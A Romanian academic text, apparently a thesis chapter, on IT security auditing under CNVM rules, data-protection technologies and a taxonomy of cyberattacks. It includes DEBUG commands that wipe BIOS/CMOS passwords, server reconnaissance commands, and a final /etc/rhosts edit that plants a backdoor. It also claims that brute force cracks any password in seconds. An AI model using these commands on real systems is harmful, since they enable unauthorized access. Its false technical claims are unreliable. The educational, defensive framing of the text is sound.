Ca și exemplu, conform art. 5 / Instrucțiunea nr. 2/2011 privind auditarea sistemelor informatice utilizate de entitățile autorizate, reglementate și supravegheate de Comisia Națională a Valorilor Mobiliare, sistemele informatice utilizate (…) trebuie să îndeplinească cel puțin următoarele cerințe:

să asigure integritatea, confidențialitatea, securitatea, disponibilitatea și prelucrarea datelor în orice circumstanțe, luând în considerare posibilitatea actualizării acestora, în funcție de modificările intervenite;

sistemele informatice care oferă intermediarilor și clienților lor accesul la piețe trebuie să asigure cel puțin integritatea și securitatea datelor trimise la și recepționate de la piață în sisteme de baze de date care funcționează în regim de redundanță și care să poată fi certificate în orice moment;

folosirea unei scheme de criptare, atât asupra datelor trimise, cât și asupra datelor recepționate;

să asigure elemente de identificare a datelor supuse prelucrării și verificării. Sistemele informatice trebuie să asigure identificarea exactă a timpului la care înregistrările au fost efectuate și identificarea utilizatorilor sistemului la acel moment;

să asigure confidențialitatea și protecția informațiilor și a programelor prin parole, coduri de identificare pentru accesul la informații, precum și realizarea de copii de siguranță pentru programe și informații deținute.

Înainte ca auditorii de securitate să înceapă un audit al organizației, există anumite activități care trebuie definite.Auditorii trebuie să știe ce anume va fi auditat.

Primul instrument este un studiu al locației. Aceasta este o descriere tehnică a terminalelor din sistem. Ea include, de asemenea, management și date demografice despre utilizatori. Deși aceste informații par a fi depășite, ele încă mai oferă o viziune generală. Pot fi utilizate și chestionarele de securitate. Aceste chestionare sunt, prin natura lor, măsurători subiective, dar ele sunt utile deoarece oferă un cadru de practici de securitate convenite. Respondenții sunt de obicei rugați să evalueze controalele folosite pentru a reglementa accesul la activele IT. Aceste controale includ: controale de management, controale de acces / autentificare, securitatea fizică, accesul din afară la sisteme, controlul procedurilor de administrare a sistemului, conexiuni la rețele externe, acces de la distanță,

reacția la incidente și planificarea de urgență.

Sondajele și chestionarele de securitate trebuie să fie scrise clar, cu răspunsuri cuantificabile la cerințe specifice. Acestea asigură o scară valorică de la cel mai slab (nu îndeplinește cerințele) la cele mai bune (îndeplinește cerințele și are documentele justificative). Auditorii, în special auditorii interni, trebuie să revadă lista incidentelor anterioare de securitate în cadrul organizației pentru a obține o idee despre punctele slabe în profilul de securitate al organizației. Aceștia vor examina, de asemenea, condițiile actuale pentru a se asigura că incidentele nu se pot repeta. În cazul în care auditorilor li se cere să examineze un sistem care permite conexiuni la Internet, aceștia vor verifica, de asemenea, logurile IDS / Firewall. „Arată aceste jurnale încercări de a exploata punctele slabe? Ar putea exista un motiv de bază (cum ar fi reguli improprii ale firewall-ului), că astfel de tentative să aibă loc în mod repetat? Cum pot acestea să fie testate?”

Din cauza mulțimii de date care trebuie să fie examinate, auditorii trebuie să lucreze cu clientul pentru a determina scopul auditului. Factorii care sunt luați în considerare includ: planul de afaceri, locația, tipul de date protejate și valoarea / importanța acestor date pentru organizația client, incidente de securitate anterioare, timpul disponibil pentru a finaliza auditul și expertiza auditorilor. Scopul auditului trebuie să fie clar definit, înțeles și acceptat de către client, apoi se va dezvolta un plan de audit. Acest plan cuprinde modul în care va fi executat auditul, personalul cu care se va lucra și instrumentele folosite. Planul de audit este dezbătut cu solicitantul.

Auditorii trebuie să fie corecți și atenți la detalii, aplicând standarde și proceduri coerente pe tot parcursul auditului. În timpul auditului, ei vor colecta date cu privire la securitatea fizică a activelor computerizate și vor efectua interviuri cu personalul din locație. Se pot efectua evaluări ale vulnerabilităților din rețea, evaluări ale sistemului de operare și ale securității aplicațiilor, evaluarea controlului de acces și alte evaluări. De-a lungul acestui proces, auditorii trebuie să urmeze listele de verificare, dar să și fie atenți la problemele neașteptate.

Odată cu raportul de audit se emite un format general de rezumat executiv, constatările detaliate și datele de sprijin, cum ar fi rapoarte de scanare ca anexe la raport. Este important de realizat că atât punctele forte cât și deficiențele pot fi abordate în rezumatul executiv pentru a ajuta la echilibrul raportului de audit. În continuare, auditorii pot oferi un raport detaliat bazat pe listele de verificări.

Constatările auditului trebuie să fie organizate într-o manieră

simplă și logică, în foi de lucru separate pentru fiecare problemă descoperită. Aceasta foaie de lucru prezintă problema, implicațiile sale și modul în care aceasta poate fi corectată.

În Instrucțiunea nr. 2/201111 privind auditarea sistemelor informatice utilizate de entitățile autorizate, reglementate și supravegheate de Comisia Națională a Valorilor Mobiliare se prevede că: „Auditorul IT are obligația de a întocmi la încheierea auditării un raport de audit” care trebuie să cuprindă cel puțin următoarele elemente:

1. titlul raportului și denumirea entității auditate (beneficiarul raportului);

2. datele de identificare ale auditorului IT (cel puțin numele, numărul certificatului CISA, telefon, fax, e-mail și adresa unde își desfășoară activitatea);

3. semnătura auditorului;

4. destinatarii raportului și restricțiile privind distribuția raportului;

5. locul auditării;

6. data raportului;

7. perioada acoperită de audit;

8. descrierea ariei auditului, incluzând și:

a) descrierea entității auditate;

b) descrierea sistemelor auditate;

c) măsurile organizatorice: politicile aplicabile și procedurile implementate;

d) identificarea aplicațiilor utilizate și persoanele implicate;

e) componentele sistemelor informatice utilizate: aplicație / server / sistem de operare / detalii despre configurare / locație / administrare;

f) analiza riscurilor implicate de activitate, a posibilelor vulnerabilități ale sistemului informatic auditat și a măsurilor de reducere a riscurilor asociate (controale);

g) descrierea modului prin care s-a efectuat atacul etic și rezultatul obținut;

9. opinia detaliată a auditorului privind îndeplinirea cerințelor (pentru fiecare cerință, cu mențiunea: DA/NU, precum și motivația.);

10. afirmația de conformitate (opinia pozitivă), de conformare parțială / totală referitoare la obiectivele auditate, indicând punctele care trebuie îmbunătățite (opinie cu rezerve / calificată), sau de neîndeplinire a obiectivelor auditate (opinia negativă);

11. anexă distinctă conținând constatările, riscurile asociate, recomandările pentru acțiuni corective și răspunsul managementului entității auditate (pentru fiecare constatare din raport). Anexa va fi semnată de un reprezentant al conducerii executive a entității auditate;

11 Capitolul IV – Obligațiile auditorilor IT, art. 8 punctul 1

12. declarația auditorului că auditul a fost efectuat în conformitate cu standardele de audit ISACA;

13. declarație a auditorului pe proprie răspundere, sub semnătură olografă, că nu se află în relații cu entitatea auditată sau cu angajații cheie, ori cu conducerea entității, care ar putea să îi afecteze independența sau obiectivitatea;

14. măsurile corective recomandate;

15. răspunsul managementului cu privire la măsurile corective recomandate, inclusiv termenul de aplicare;

16. data următorului audit;

17. alte observații.

Punctul 2 din instrucțiunea menționată specifică clar că raportul va fi întocmit în conformitate cu standardele ISACA-S2 și S7 sau cu standardul ISAE 3000 și ghidul ISACA-G20 pentru verificări de tip audit.

1.8 Tehnologii de securizare a datelor și administrarea acestora

„Atunci când informațiile sunt stocate pe sisteme informatice compania își asumă un risc ori de cate ori acestea sunt accesate, de exemplu spitalele pot pierde informații detaliate privind starea de sănătate a pacienților, iar instituțiile financiare trebuie să se asigure că informațiile critice nu pot fi compromise”[8]. Dacă informațiile ajung în posesia unui atacator, riscurile și posibilitățile acestuia sunt nelimitate. Companiile își pierd credibilitatea, pot fi acționate în justiție și își expun angajații și clienții la furt de identitate sau fraude. Într-un recent comunicat de presă (16 mai 2011), Kazuo Hirai, Executive Deputy President, Sony Corporation, declara: “Prioritatea principală a companiei este siguranța și securitate informațiilor personale ale clienților.

Facem din protejarea datelor un angajament prioritar și continuu și am dezvoltat tehnologii de securizare avansate, pentru ca utilizatorii să se simtă protejați și încrezători (…).”

Câteva tehnologii utilizate pentru securizarea și administrarea transmisiilor de date.

Controlul accesului este un termen folosit pentru a defini un set de tehnologii de securitate care sunt proiectate pentru restricționarea accesului. Aceasta presupune că numai persoanele care au permisiunea vor putea folosi calculatorul și avea acces la datele stocate. Termenul de control al accesului (cunoscut mai ales sub denumirea în engleză de „acces control”) definește un set de mecanisme de control implementate în sistemele de operare de către producători pentru restricționarea accesului. De această facilitate beneficiază sistemele de operare Windows, UNIX, Linux ș.a.

Identificarea și autentificarea, folosindu-se de conturi și parole, permit doar accesul utilizatorilor autorizați la informație. Identificarea și autentificarea poate fi făcută și cu ajutorul unor dispozitive cum ar fi cardurile electronice sau prin metode biometrice care presupun identificarea după amprentă, voce, irisul ochiului etc.

Firewall-ul reprezintă un filtru hardware sau software care stopează un anumit trafic prestabilit din rețea și permite trecerea altuia. Firewall-ul se interpune între rețeaua internă și Internet și filtrează pachetele care trec. De asemenea, firewall-ul poate fi folosit și în interiorul propriei rețele pentru a separa subrețele cu diferite niveluri de securitate.

VPN-urile (rețele private virtuale) permit comunicarea sigură între două terminale aflate într-o rețea. O conexiune VPN se poate realiza atât în rețeaua locală, cât și în Internet. VPN folosește tehnologii de criptare avansată a informației care face ca aceasta să nu poată să fie modificată fără ca acest lucru să fie detectat iar capturarea informațiilor este descurajată datorită codificării acesteia.

Infrastructura cu chei publice (PKI) își propune să asigure securitatea în sisteme deschise, cum ar fi Internetul, și să asigure încrederea între două persoane care nu s-au cunoscut niciodată. Într-o structură PKI completă fiecare utilizator va fi complet identificat printr-o metodă garantată, iar fiecare mesaj pe care-l trimite sau aplicație pe care o lansează este transparent și complet asociat cu utilizatorul.

Secure Socket Layer (SSL) reprezintă un protocol Web securizat care permite criptarea și autentificarea comunicațiilor Web utilizând PKI pentru autentificarea serverelor și a clienților. Este destinat în special pentru servere WWW și este implementat în mai multe versiuni.

Versiunea SSL2 este cea mai răspândită, iar versiunea SSL3 e cea mai sigură, dar și cea mai greu de implementat.

Semnătură doar o dată (SSO) dorește să debaraseze utilizatorul de mulțimea de conturi și parole care trebuie introduse de fiecare dată când accesează și re-accesează programe. Pentru aceasta utilizatorul trebuie să se autentifice o singură dată. Dezideratul este greu de realizat datorit varietății de sisteme. Deocamdată acest lucru se poate realiza în cadrul firmelor care au același tip de sisteme. Web-ul folosește un subset SSO numit Web SSO, funcționarea fiind posibilă datorită faptului că serverele Web folosesc aceeași tehnologie.Tehnologiile descrise mai sus pot fi clasificate ca fiind tehnologii de restricție a accesului. Tehnologiile de restricție a accesului sunt menite să limiteze accesul la informație pe baza unor reguli prestabilite. Pe lângă tehnologiile de restricționare, securitatea sistemelor trebuie administrată, monitorizată și întreținută. Pentru aceasta trebuie asigurate următoarele operații: administrarea, detectarea intrușilor, scanarea vulnerabilităților și controlul virușilor.

Administrarea sistemelor de calcul presupune și controlul și întreținerea modului de acces la acestea de către utilizatori. Un utilizator care folosește o parolă scurtă sau care este ușor de ghicit va face ca acel sistem să fie ușor de atacat. Atunci când un angajat este concediat sau pleacă pur și simplu de la firma respectivă, trebuie schimbate denumirile utilizatorului și parola. Denumirea utilizatorului și a parolei trebuie făcută cu foarte mare atenție și responsabilitate. Sarcina este de competența persoanei însărcinate cu securitatea informatică.

Detectarea intrușilor trebuie făcută permanent. Pentru aceasta există programe care controlează traficul și care țin jurnale de acces (log-uri). Verificarea se va face la nivelul fiecărui sistem informatic. Trebuie făcută aici distincție între încercările de penetrare din afară și cele din interior. De asemenea, trebuie separate încercările de acces neautorizat din rețeaua internă de accesul neautorizat la un calculator lăsat nesupravegheat de către utilizator.

Scanarea vulnerabilității, care este de fapt o analiză a vulnerabilității, presupune investigarea configurației la nivel intern pentru detectarea eventualelor găuri de securitate. Acesta se face atât la nivel hardware, cât și software. Folosirea unui creator de parole (brute force) va avea ca efect aflarea parolei în câteva secunde, indiferent de lungimea acesteia.

Controlul virușilor se va face pentru a detecta și elimina programele malițioase din sistemele de calcul. Acestea se pot repede împrăștia la toate calculatoarele din sistem și pot paraliza funcționarea acestora sau pot produce distrugeri ale informației. Se impune obligatoriu să fie instalate programe antivirus, actualizarea semnăturilor de viruși să se facă cât mai des, iar scanarea pentru detectarea virușilor să se facă de oricâte ori este nevoie.

Capitolul 2.Atacuri asupra datelor din sistemele informatice

Conform „Regulamentului privind managementul situațiilor de urgență specifice tipurilor de riscuri din domeniul de competență al Ministerului comunicațiilor și tehnologiei informației” aprobat prin OMCTI nr.47/06.12.2005 si OMAI nr. 1149/19.01.2006, „atacul informatic reprezintă acțiunea prin care sunt afectate rețelele de calculatoare ale unei organizații (agenții guvernamentale sau companii) cu scopul de a le sabota activitatea (întreruperea fluxurilor de date, indisponibilizarea serviciilor furnizate prin mijloace electronice, etc), de a obține informații confidențiale sau secrete (numere de conturi, de card, liste cu clienți, informații tehnice etc.), ori de a transfera ilegal bani în contul celui care atacă”.

Experții Kaspersky Lab (creatorii produselor sub sigla Kaspersky) menționează pe baza informațiilor adunate de la utilizatorii produselor de securitate proprii că în primul trimestru al anului 2011 au fost 241 milioane de atacuri de rețea blocate, 85,8 milioane de tentative de infectare cu malware web prevenite, 219,8 milioane de programe periculoase identificate și neutralizate pe computerele utilizatorilor și 96,7 milioane de verdicte date în urma analizei euristice. Atacatorii folosesc cu precădere exploit-urile Java – din totalul de cinci programe periculoase de tip exploit apărute în clasamentul celor mai răspândite 20 de amenințări informatice pe Internet în luna martie 2011 trei dintre ele ținteau vulnerabilități ale platformei Java. De asemenea, așa numiții „creatori de viruși” au început să reacționeze foarte rapid la anunțurile care vorbesc despre descoperirea unor noi breșe de securitate. Un exemplu în acest sens este o vulnerabilitate în Adobe Flash Player, care oferă unui atacator posibilitatea de a prelua controlul asupra computerului infectat. Aceasta a fost anunțată de către Adobe pe data de 14 martie, iar a doua zi Kaspersky Lab a detectat deja un exploit pentru ea.

Ingineria socială rămâne o metodă foarte des folosită pentru înșelătorii și fraude. Știri false despre cutremurul și tsunami-ul din Japonia, precum și despre moartea actriței Elizabeth Taylor, au fost folosite pentru a direcționa utilizatorii către site-uri periculoase. În plus, s-au creat site-uri false prin intermediul cărora se cereau donații pentru victimele evenimentelor tragice din Japonia.

2.1 Tipologia atacurilor asupra informației din rețelele de calculatoare

Atacurile asupra informației din sistemele de calcul pot lua diferite forme. O primă clasificare[3] a atacurilor poate fi făcută ținând cont de locul de unde se execută atacul. Distingem astfel două categorii de atacuri: locale și la distanță. O a doua clasificare poate fi făcută după modul de interacțiune a atacatorului cu informația rezultată în urma unui atac reușit.Aici se disting două categorii de atacuri: pasive și active.

Atacurile pasive au ca scop mai degrabă vizualizarea informației și mai puțin alterarea și distrugerea acesteia. În această categorie de atacuri pot fi incluse „testările” realizate de hackerul cunoscut sub pseudonimul TinKode, prin care s-a reușit penetrarea mai multor sisteme informatice considerate sigure: NASA Goddard Space Flight Center, European Space Agency (ESA), Sun.com (Oracle Sun Microsystems), MySQL.com (inclusiv MySQL France, Italy, Japan, Germany), ESET Nod32 Romania, Minister Of Defence United Kingdom (www.mod.uk), U.S. Army Civil Affairs & Psychological Operations Command Website, US Army 470th MI Brigade WebSite, Youtube.com.

Atacurile active au ca scop furtul, inserarea, alterarea sau distrugerea informației. Aici pot fi incluse atacurile „naționale” ale grupului RNS (Romanian National Security) asupra unor portaluri de știri străine care au atentat la imaginea publică a României.

2.1.1 Atacul local

Atacurile locale urmăresc spargerea securității unei rețele de calculatoare de către o persoană care face parte din personalul angajat al unei firme, deci un utilizator local. Acesta dispune de un cont și de o parolă care îi dau acces la o parte din resursele sistemului. De asemenea, persoana respectivă poate să aibă cunoștințe despre arhitectura de securitate a firmei și în acest fel să-i fie mai ușor să lanseze atacuri. În această categorie se poate încadra cunoscutul caz Wikileaks în care informațiile au fost obținute printr-un om din interior care a reușit accesarea datelor protejate și copierea neautorizată a acestora.

Atacatorul, de la calculatorul propriu, exploatând lacunele de securitate ale sistemului informatic, va putea să-și sporească privilegiile și în acest fel să acceseze informații la care nu are drept de acces. Astfel, va putea să încarce programe care să scaneze rețeaua și să găsească punctele vulnerabile. Lipsa discului flexibil sau unității CD-ROM cu ajutorul cărora să se poată introduce programe poate fi suplinită de programele pe care utilizatorul le procură din Internet. Obținerea de drepturi de root, drepturile de administrator, reprezintă țelul atacatorilor. Dacă local îi sunt limitate drepturile de configurare a modului de pornire a sistemului de operare, de exemplu nu se poate face încărcarea sistemului de operare de pe dischetă, utilizatorul ar putea trece

peste aceasta dacă știe combinațiile secrete de parole CMOS de la producător sau cu ajutorul utilitarului DEBUG:

Se rulează utilitarul cmd și se tastează debug Se va primi un prompter “-” și se va introduce:

Pentru AMI/AWARD BIOS

O 70 17

O 71 17

Pentru QPHOENIX BIOS

O 70 FF

O 71 17

Pentru QGENERIC – Invalidare CMOS RAM. AT motherboards (XT motherboards don't have CMOS)

O 70 2E O 71 FF Q

Codurile modifică 2 bytes în format hexa sau se poate folosi un mic script:

A <ENTER>

MOV AX,0 <ENTER> MOV AX,CX <ENTER> OUT 70,AL <ENTER> MOV AX,0 <ENTER> OUT 71,AL <ENTER> INC CX <ENTER>

CMP CX,100 <ENTER> JB 103 <ENTER>

INT 20 <ENTER> <ENTER>

G <ENTER> Apăsând G se va executa scriptul de mai sus

Q <ENTER>

Dacă nu sunt aplicate actualizările pentru BIOS, computerul la repornire va afișa o eroare și va oferi acces la setările BIOS.

2.1.2 Atacul la distanță

Atacul la distanță (remote attack) este un atac lansat împotriva unui calculator despre care atacatorul nu deține nici un fel de control, calculatorul aflându-se la distanță. Calculator la distanță (sau mașină la distanță – remote machine) este orice sistem informatic care poate fi accesat în rețeaua locală sau în Internet altul decât cel de la care se inițiază atacul. În această categorie intră atacurile efectuate de TinKode, de exemplu asupra site-ului Google, când hackerul a ținut să scoată la iveală o vulnerabilitate chiar de Ziua Națională a României, pe 1 decembrie 2010.

Prima etapă în atacul la distanță este una de tatonare. Atacatorul va trebui să identifice: cine este administratorul, calculatoarele (mașinile) din rețea, funcțiile acestora și serverul de domeniu, sistemele de operare folosite, punctele de vulnerabilitate,diverse informații despre topologia rețelei, construcția și administrarea acesteia, politici de securitate etc.

În funcție de dimensiunea și arhitectura rețelei în care se află calculatorul-țintă, folosind programe de scanare și / sau comenzi speciale se pot obține informații despre numele și adresele IP ale calculatoarelor din domeniu. O interogare DNS tip HOST sau NSLOOKUP va produce un volum foarte mare de informații despre un domeniu cu multe calculatoare. O interogare WHOIS va determina dacă ținta este o mașină reală, un nod sau un domeniu virtual. În cazul unor interogări se poate determina și sistemul de operare de pe calculatorul-țintă, aceasta ușurând considerabil munca. A doua etapă este una de testare. Uneori, din nerăbdarea de a obține informația cât mai repede cu putință, această etapă este omisă. Ea presupune crearea unei clone a țintei pe baza rezultatelor obținute și testarea atacului pentru a se vedea comportamentul. În acest fel, se fac teste pe un sistem clonă care nu va atrage atenția administratorilor de securitate. Dacă aceste experimente se fac pe ținta reală, atunci acest lucru poate fi sesizat și atacul să eșueze atacatorul fiind depistat. Etapa a treia presupune efectuarea atacului real asupra țintei. Atacul durează de obicei foarte puțin și este efectuat atunci când ținta este mai puțin supravegheată. În urma acestui atac se obțin informațiile scontate.

2.1.3 Atacurile DDOS și BotNets.

Un atac de tip DdoS(Distributed Denial of Service )[web5] este o încercare a unor persoane de a suprasolicita resursele unui server, încetinindu-i funcțiile de bază. Țintele vizate în general sunt site-urile cu profil important: rețele sociale, bănci, root-urile unor nameservere etc ce au foarte mari șanse să fie observate la nivel global și să aibă un impact destul de mare asupra diferitelor surse de venit.

Exista mai multe tipuri de atacuri DDOS, unele fiind mai ușor de realizat decât altele: ICMP flood (cunoscut și sub denumirile Smurf attack, Ping flood sau Ping of death), Teardrop Attacks, Peer to peer attacks, Permanent denial of service attacks, Distributed attack, Unintentional denial of service, Denial-of-Service Level II, SynFlood, DNS DOS. Dintre acestea cele mai periculoase sunt atacurile de tip DDoS, Permanent Denial Of Service, P2P Attacks și în unele cazuri SynFlood. Primele trei tipuri de atac folosesc în general un număr mare de clienți (boți sau „zombies”) care se conectează la aceeași țintă într-un timp foarte scurt și simultan, trimițând un număr foarte mare de pachete. Aceste tipuri de atacuri sunt cele mai periculoase, majoritatea site-urilor rămânând fără apărare la un astfel de atac.

DDoS folosește ca și clienți de conectare computerele infectate de malware (software proiectat intenționat pentru deteriorarea unui computer sau infiltrarea în el, sau / și deteriorarea ori infiltrarea în rețele de computere, fără consimțământul proprietarului) în general, sau prin descărcarea de aplicații de pe site-uri infectate. Aceste computere infectate se numesc în general zombie sau rețele de boți (Botnets). Permanent Denial Of Service este o tehnică destul de apropiată de prima cu excepția faptului că afectează atât de mult componentele hardware încât nu vor putea fi restaurate sistemele decât în cazul înlocuirii acestora.

P2PAttacks sunt o tehnică similară DDoS, cu excepția faptului că abuzează de anumite vulnerabilități ale aplicațiilor de sharing (partajare informații) în general, ce oferă controlul clienților conectați pe serverele respective. Aceste vulnerabilități se găsesc în aplicațiile ce țin serverele hub-urilor dc++, a aplicațiilor de tip torrent etc. Acestea sunt la fel de eficiente ca și atacurile cu rețele de zombie, dar au un avantaj prin faptul că oricând va fi la dispoziție o rețea de computere "infectate" spre deosebire de primul tip de atac ce are nevoie de construirea acesteia.

SynFlood este o tehnică ceva mai diferită de celelalte trei prezentate. Aceasta vizează aplicațiile ce deschid porturi și încearcă supraîncărcarea memoriilor acestora prin deschiderea de nenumărate conexiuni și neînchizându-le. În general aceste atacuri duc la blocarea sistemului respectiv, printr-o vulnerabilitate a sistemelor denumită "buffer overflow".

2.1.4 Atacuri web

Atacurile web sunt tehnici „ce vizează diverse vulnerabilități ale site-urilor pentru crearea unor exploits[web6] (program sau o secvență de date ori de comenzi care exploatează o vulnerabilitate a unui sistem informatic în scopul de a cauza un comportament neprevăzut sau neanticipat al respectivului sistem) ce pot infecta diverse victime în cazul viermilor XSS, sau extrage bazele de date, șterge și încărca fișiere pe serverele exploatate etc”.

Există mai multe tipuri de atacuri web, care necesită cunoștințe diferite, de la JavaScript și HTMLpână la SQL, LINUX și PHP:

XSS – Atacurile de tip Cross Side Scripting sunt atacuri ce permit inserarea codului JavaScript. În cazul în care aceste atacuri sunt permanente (nu sunt doar pe clientul ce pune codul malițios) acestea pot duce la crearea unor viermi de tip XSS ce pot afecta spre exemplu rețelele sociale. Daca aceste atacuri sunt temporare ele vizează în general furarea cookiurilor din browserele utilizatorilor;

CSRF – Cross Side Remote Forgery sunt vulnerabilități ce permit delogarea, modificarea printr-un link a unor informații. Acestea, împreună cu un XSS permanent, creează un atac de răspândire extrem de periculos în cadrul unor rețele;

LFI/RFI – Local/Remote File Inclusion sunt două tehnici diferite ce au ca scop obținerea informațiilor de pe serverele pe care sunt găzduite site-urile și în același timp de încărcare neautorizată a unor fișiere (de tip shell) pentru a obține controlul total asupra serverelor respective (cont de root);

SQL Injection – Atacurile de tip SQL Injection vizează parametri paginilor web cu ajutorul cărora se fac interogări SQL. Atacatorul încearcă să altereze acești parametri pentru a modifica interogarea, generând una nouă ce îi extrage informații confidențiale din baza de date, de la conturi și parole până la cărți de credite etc. Acest gen de atac poate duce și la încărcarea unor fișiere neautorizate pe serverul respectiv și rularea fără autorizare a unor scripturi periculoase;

Atacurile WEB 2.0 – sunt probabil cea mai nouă tehnică de atacuri ce urmărește extensiile ce le folosesc aplicațiile WEB 2.0 pentru a comunica prin intermediul API-urilor (API este acronimul din limba engleză pentru Application Programming Interface – interfața pentru programare de aplicații, de obicei fiind vorba despre interfața dintre programele de aplicație și sistemul de operare, care stabilește în amănunt modul în care aplicațiile pot accesa (apela) serviciile sistemului pe care rulează.). Acestea încearcă să exploateze extensiile pentru a ajunge la aplicațiile sociale. Sunt extrem de periculoase mai ales în cazul în care extensiile respective sunt foarte populare: un exemplu recent s-a întâmplat la Facebook, unde primele extensii din top după numărul de utilizatori erau vulnerabile la XSS și SQL Injection;

Spamming (sau spam) este procesul de expediere a mesajelor electronice nesolicitate, de cele mai multe ori cu caracter comercial, de publicitate pentru produse și servicii dubioase, practicată în general în industria e-marketingului și de proprietarii de situri pornografice. De multe ori mesajele spam conțin ca atașamente fișiere dăunătoare;

Phishing-ul reprezintă o formă de activitate criminală care constă în obținerea unor date confidențiale, cum ar fi date de acces pentru aplicații de tip bancar, aplicații de comerț (de exemplu: eBay, PayPal) sau informații referitoare la carduri de credit, folosind tehnici de manipulare a datelor identității unei persoane sau a unei instituții. Un atac de tip phishing constă, în mod normal, în trimiterea de către atacator a unui mesaj electronic (nesolicitat, tip spam), folosind programe de mesagerie sau telefon, în care utilizatorul este sfătuit să-și dea datele confidențiale pentru a câștiga anumite premii, sau este informat că acestea sunt necesare datorită unor erori tehnice care au dus la pierderea datelor originale. În mesajul electronic este indicată de obicei și o adresă web care conține o clona a site-ului instituției financiare sau de comerț căreia i s-a copiat identitatea;

Crimeware[web7] este un program periculos care este instalat în secret pe un PC. Majoritatea programelor crimeware sunt de fapt diverși troieni. Sunt mai multe tipuri de troieni creați pentru a face diferite lucruri. De exemplu, unii sunt folosiți pentru a înregistra fiecare tastă apăsată (denumiți keylogger), alții realizează capturi de ecran atunci când se accesează site-ul unei bănci, alții descarcă pe PC coduri periculoase iar alții permit unui hacker să acceseze de la distanță PC (denumiți backdoor). Toți acești troieni au în comun abilitatea de a fura datele personale – cum ar fi parolele sau PIN-urile – și de a le trimite infractorilor. Având aceste informații la dispoziție, un infractor cibernetic poate accesa contul bancar și fura banii;

Scareware reprezintă o clasă de aplicații false, care în general nu aduc nici un beneficiu. Ținta acestora este de a infecta utilizatorii și a crea simptomele unor viruși în general, oferindu-le "soluții" de aplicații împotriva acestora. În toate situațiile aceste aplicații sunt fictive, iar multe persoane sunt speriate de "virușii ce îi au în computer" și cumpără produsele oferite. La ora actuală se pot găsi oferite spre descărcare și cumpărare peste 100 de aplicații care copiază metodele de acțiune și aspectul unor programe antivirus legitime.

2.2 Tehnici și instrumente de atac

Pentru a putea controla de la distanță un sistem informatic sau pentru a i se facilita accesul la informațiile stocate pe acesta există diverse aplicații create de programatori experimentați – „backdoors”, acestea fiind accesibile pe internet. Majoritatea atacurilor informatice se folosesc de diverse instrumente și tehnici, cele mai cunoscute fiind virușii.

Noțiunea de virus informatic este generală. Aceasta descrie un număr de diferite tipuri de atac asupra sistemelor informatice. Un virus reprezintă un cod malițios de program care se autocopiază în alte programe și pe care le modifică. Un cod malițios va lansa în execuție operații care vor avea efect asupra securității datelor din calculator.

Un trojan (trojan horse) este numele unor aplicații din clasa malware ce au ca scop obținerea informațiilor de pe computerului infectat, precum și obținerea controlului acestuia. Aplicațiile de acest gen necesită interacțiunea cu o persoană ce controlează aplicația, oferindu-i sarcini de la înregistrarea tastaturii și a extragerii conturilor din browsere, clienti ftp etc. până la afișare de mesaje pe ecran, închiderea computerului ș.a. Câteva instrumente care folosesc aceste tehnici sunt aplicații gen Prorat sau Radmin.

Rootkiturile sunt aplicații ce au înglobate diverse instrumente ce permit modificarea unor executabile existente în computerul victimei ce creează impresia că aplicațiile rulează așa cum trebuie. Acestea sunt necesare în situațiile în care atacatorii doresc să introducă spre exemplu un trojan în computerului victimei, dar pe care antivirusul acestuia îl blochează. El va avea nevoie de o aplicație care va șterge antivirusul și va rula un executabil al atacatorului ce creează o iconiță în StartMenu pentru a nu apărea dubii din partea victimei. Același toolkit va avea nevoie de un AutoDownloader ce va descărca aplicația de tip trojan și o va instala pe computerului victimei.

Un worm (vierme) este o aplicație ce se răspândește automat în computerul infectat și în aplicațiile de la capătul punctelor de ieșire din acesta. Se folosește în general de vulnerabilitatea din cadrul rețelelor pentru a se răspândi prin acestea, infectând toate computerele ce sunt deschise în momentul răspândirii lor. Au abilitatea de a infecta alte aplicații și o dată cu acestea orice CD, suport de date extern (stick de memorie USB) care copiază fișierele infectate va crea un alt punct de pornire al unei noi infecții. Acest gen de aplicații au scopuri și ținte clare, în general vizează crearea de rețele botnet, precum și de afișarea a mesajelor "amuzante" la o dată importantă dintr-un an (1 aprilie, Crăciun, ziua lui Michelangelo, etc).

Spyware-urile sunt un alt gen de aplicații din categoria Malware, ce în general au ca scop monitorizarea persoanelor infectate. Rolul lor nu rămâne doar la a monitoriza paginile vizitate, a tastaturii etc. ci poate duce și la modificarea paginilor afișate în căutări, încetinirea reacției computerului, încărcarea rețelei etc. Se presupune, făcând o medie generală de pe site-urile de specialitate, că la ora actuală există peste 11 milioane de exemplare de malware.

2.3 Exemple de atacuri asupra unui server

Acest tutorial este intenționat incomplet. Nu doresc ca prin exemplele date să ajut pe cineva să producă daune unui sistem informatic.

Strângerea de informații este vitală pentru a putea obține acces pe un server. Pentru a afla adresa IP-ul a serverului[web8]:

c:/>windows>tracert -j server.com

Se verifică dacă are activată opțiunea de partajare a resurselor "file and print share

enabled" și dacă sistemul de operare este Linux sau Windows.

c:/>windows>nbtstat -A ipadress

unde ipadress este adresa de IP găsită anterior. Comanda va lista numele tuturor utilizatorilor din memoria cache dacă serverul este prost configurat.

Aflăm serviciile care rulează pe server: ftp, telnet, smtp, precum și versiunea lor.

c:/>windows>ftp server.com

Daca are serviciu ftp va apărea ceva de genul "connected to server running WUFTPD…" Astfel se descoperă versiunea de server ftp care rulează pe portul 21. În browserul web se introduce:

http://www.server.com/nopage.html

Dacă nu e configurat bine se va primi un răspuns de genul "file not found on this server. Server running Apache …"S-a descoperit astfel și versiunea serverului pe care sunt stocate paginile web.

La fel se procedează cu SMTP (Simple Mail Transport Protocol), care rulează pe portul 25.

c:/>windows>telnet qmail.server.com 25

Cunoscând toate serviciile care rulează pe server și versiunea acestora se poate foarte ușor găsi un exploit pentru ele. Folosind diverse utilitare specifice se scanează după toate bug-urile cunoscute în cgi-bin, cgi-win și scripts. Foarte multe informații despre vulnerabilitățile lor se pot găsi pe diverse site-uri gen http://packetstormsecurity.org/. Cunoscând aceste informații se poate afla parola și câștiga astfel accesul pe server.

Instalarea unui backdoor pe server se poate face în funcție de sistemul de operare. În Unix toți utilizatorii care au acces la server sunt păstrați în fișierul etc/rhosts. După ce s-a

reușit pătrunderea în sistem, se editează fișierul etc/rhosts: #ed etc/rhosts?mysite.com anyuser*w*q

